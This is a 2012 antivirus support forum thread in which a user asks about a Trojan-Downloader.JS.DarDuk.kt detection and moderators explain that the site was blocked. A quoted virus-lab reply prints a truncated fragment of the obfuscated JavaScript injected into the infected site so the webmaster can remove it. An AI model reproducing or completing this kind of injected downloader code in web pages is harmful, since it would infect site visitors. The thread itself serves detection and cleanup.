> KAV and Trojan-Downloader.JS.DarDuk.kt
pustolovka
post 13.04.2012 18:35
Post #1


Member
Group: Members

My KAV 2012 detected Trojan-Downloader.JS.DarDuk.kt when I visited a particular web page. One minute later I googled it again and clicked on it and KAV did not report that it was malicious. Is my computer still infected? How can I be sure that this trojan is not downloaded on my computer? Here is a screenshot of the report:
Attached File(s)
Attached File  trojan_potlista.png ( 132,04K ) Number of downloads: 45
 
Berny
post 13.04.2012 19:30
Post #2


Forum Elite
Group: Moderators

An infected website was detected and blocked.
Your PC was not infected.
Please right click the detected object and delete it from the list,
then reboot and proceed with CCleaner.

This post has been edited by Berny: 13.04.2012 19:30
Caos
post 13.04.2012 19:46
Post #3


Spanish Forum Moderator
Group: Moderators

QUOTE
Hello,

This is not a false alarm, this site is infected.

Here is the malicious code:
<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["substr"](2);}w=this;e=w[f.substr(11)+zz];t='y';}
n="3.5!3.5!51.5!50!15!19!49!54.5!48.5!57.

If you are a webmaster, please remove the above code from the page. Also we strongly recommend that you change login/password, because they can be stolen.
Regards
Virus Analyst


pustolovka
post 14.04.2012 19:03
Post #4


Member
Group: Members

QUOTE(Berny @ 13.04.2012 19:30) *
An infected website was detected and blocked.
Your PC was not infected.
Please right click the detected object and delete it from the list,
then reboot and proceed with CCleaner.


Thanks!
Can you please tell me what the quoted post under (from Caos) means?
rudger79
post 14.04.2012 20:18
Post #5


Forum Elite
Group: Gold beta testers

Caos sent the website to KL virus lab to check. Kaspersky Virus lab responded with what is in the quote. To paraphrase: the site is infected with identification of the code that is malicious. Also KL has instructions for web master and to change your passwords and login credentials. As Berny says, Kaspersky blocked the infected website.

Right click that entry in your screenshot and remove or delete it; then, to be safe, scan with Kaspersky and post any detections here on the forum.

This post has been edited by rudger79: 14.04.2012 20:21


--------------------
2015 Beta Test Machine specs: Windows 7 Pro x64 SP1, Real Machine (laptop), 4GB Ram No OEM stuff. My GSI Report Link

________________________________________________________________________________
1.Laptop -
Windows 7 Pro SP 1 x64 4gb - FF latest -
KIS 2015 Beta
2.Desktop -
Windows 7 Pro SP 1 x86 4gb - FF latest - KIS 2014
_______________________________________________________________________
